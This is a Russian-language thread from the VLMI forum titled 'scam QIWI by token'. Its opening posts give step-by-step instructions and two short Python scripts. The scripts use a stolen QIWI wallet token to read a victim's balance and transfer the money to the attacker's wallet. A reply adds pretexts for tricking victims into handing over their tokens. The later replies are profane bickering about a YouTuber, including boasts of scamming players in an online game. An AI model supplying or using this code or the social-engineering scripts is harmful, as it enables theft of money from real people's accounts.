• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

После регистрации будут доступны основные разделы.

Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Скам киви по токену.

Parzival

Местный
Реакции
216
0 руб.
Нам понадобится Python 3,6
(если нету то устанавливаем)
Заходим в папку с питоном, далее в папку Scripts и создаем bat файл с кодом

Код:
pip install SimpleQIWI

После того, как установит компонент.
Создаем файл Balance_Check.py
Пишем туда код

Код:
from SimpleQIWI import *

print('Q I W I Software 1.0 / coded by Mad_1337');
token=input('Enter token: ')
phone=input('Enter phone: ');
api = QApi(token=token, phone=phone)
print('Balance Founded')
print(api.balance)
input()

Вуаля, открыв файл нас попросит ввести токен, копируем токен жертвы и вставляем как на скрине
1.jpg

Жмем Enter
2.jpg

Получаем баланс в рублях.

Создаем ещё файл, вставляем код

Код:
from SimpleQIWI import *

print('Q I W I Software 1.0 / coded by Mad_1337');
token=input('Enter token: ')
phone=input('Enter phone: ');
api = QApi(token=token, phone=phone)
print('Balance Founded')
print(api.balance)
api.pay(account="ваш фрукт киви", amount=сумма, comment='сорри бро что спиздил твои бабки')
print(api.balance)
input()

Parzival

Местный
Реакции
216
0 руб.
Если бы ещё дополнение было как узнать токен жертвы, было бы вообще супер.
1. Можно просто вежливо попросить)
2. Вот пример...
3. Просто развести мол " нужен токен чтобы сбросить тебе деньги, потому что - хуй знает почему( "
Но обычно всегда срабатывает первый вариант)

Последнее редактирование:

Jumpux

Местный
Реакции
152
0 руб.
Telegram
Это уже было. И было до видео этого супер мега хацкера. На сколько я помню @RVL вроде выкладывал это в какой-то теме про киви токен

RVL

Профи
Реакции
2.221
0 руб.
Telegram
Please note, if you want to make a deal with this user, that it is blocked.
  • Мне нравится
Реакции: Dar

RVL

Профи
Реакции
2.221
0 руб.
Telegram
заебало уже,как только появляется видео сразу начинают плодить темы,дизайнер,разлогинься. И хватит копипастить
Для тебя овер авторитет? Который рерайтит паблик темы 2-12 месячной давности с влми и дв в абсолютно всех своих видео. Это он как раз копипастит, а теме с киви токеном около 3 месяцев в паблике. В привате так вообще хз сколько она валялась, чуть ли не пол года.

Jumpux

Местный
Реакции
152
0 руб.
Telegram
Для тебя овер авторитет? Который рерайтит паблик темы 2-12 месячной давности с влми и дв в абсолютно всех своих видео. Это он как раз копипастит, а теме с киви токеном около 3 месяцев в паблике. В привате так вообще хз сколько она валялась, чуть ли не пол года.
В том то и дело, что он рерайтит темы паблик олдовые, и выставляет их как за новинку. Базара нет, он может иногда что-нибудь интересное найти что я не знаю и многие другие. Но Пиздабол он еще тот. Просто тупо показывает магические вещи детям на ютубе. Это тоже самое как задосить что-либо через ping в CMD, просто забив свой канал.

RVL

Профи
Реакции
2.221
0 руб.
Telegram
В том то и дело, что он рерайтит темы паблик олдовые, и выставляет их как за новинку. Базара нет, он может иногда что-нибудь интересное найти что я не знаю и многие другие. Но Пиздабол он еще тот. Просто тупо показывает магические вещи детям на ютубе. Это тоже самое как задосить что-либо через ping в CMD, просто забив свой канал.
Я к нему отношусь хуёво вообще не из-за его канала. Он раньше по л2 двигался полностью. Я с ним играл 7 назад, он тогда был дном полнейним, мы в 3 скамили людей на шмотки, с нами кодер играл ещё какой-то, потом нашли баг с кристалом на дюп донок на евро пвп и хотели его за 50к продать одному донатору, так этот долбаёб слил баг админу за 20 или 30к рублей точно не помню уже, чтобы поиметь больше лично себе на лапу и не делиться. Далее на кетраварс ушёл сговорился с админом где подставлял людей и разбанивал за бабки, якобы он друг админа. Потом хейтил самого топового стримера по интерлюдии, моего знакомого (жекавона) говорил что он чмо даун и тд. А потом вместе же с ним стримил открытие серверов якобы они друзья когда админ ему косарик подкинул. Это пздц было. Двуличный долбаёб просто.

Jumpux

Местный
Реакции
152
0 руб.
Telegram
Я к нему отношусь хуёво вообще не из-за его канала. Он раньше по л2 двигался полностью. Я с ним играл 7 назад, он тогда был дном полнейним, мы в 3 скамили людей на шмотки, с нами кодер играл ещё какой-то, потом нашли баг с кристалом на дюп донок на евро пвп и хотели его за 50к продать одному донатору, так этот долбаёб слил баг админу за 20 или 30к рублей точно не помню уже, чтобы поиметь больше лично себе на лапу и не делиться. Далее на кетраварс ушёл сговорился с админом где подставлял людей и разбанивал за бабки, якобы он друг админа. Потом хейтил самого топового стримера по интерлюдии, моего знакомого (жекавона) говорил что он чмо даун и тд. А потом вместе же с ним стримил открытие серверов якобы они друзья когда админ ему косарик подкинул. Это пздц было. Двуличный долбаёб просто.
Да, я слышал от тебя уже эту историю xD

RVL

Профи
Реакции
2.221
0 руб.
Telegram
Да, я слышал от тебя уже эту историю xD
У меня поэтому ассоциация когда слышу ник овера вызывает трясучку от злости. Когда школьники человека боготворят, а ты знаешь его сущность и тебе смешно становится.

Jumpux

Местный
Реакции
152
0 руб.
Telegram
У меня поэтому ассоциация когда слышу ник овера вызывает трясучку от злости.
А это не ты случайно ему принтер ломанул? Когда ему вирусняку в комп загнали и принтер печатал только "ПИДОР"
xD

Kirikaru

Участник
Реакции
22
0 руб.
Telegram
Ты так и не понял,что я хотел сказать
А сказать я хотел,что если даже на ютубе видео появилось,то уже днище пробито и после этого тащить копипаст на форум ну пиздец как тупо.

Сверху Снизу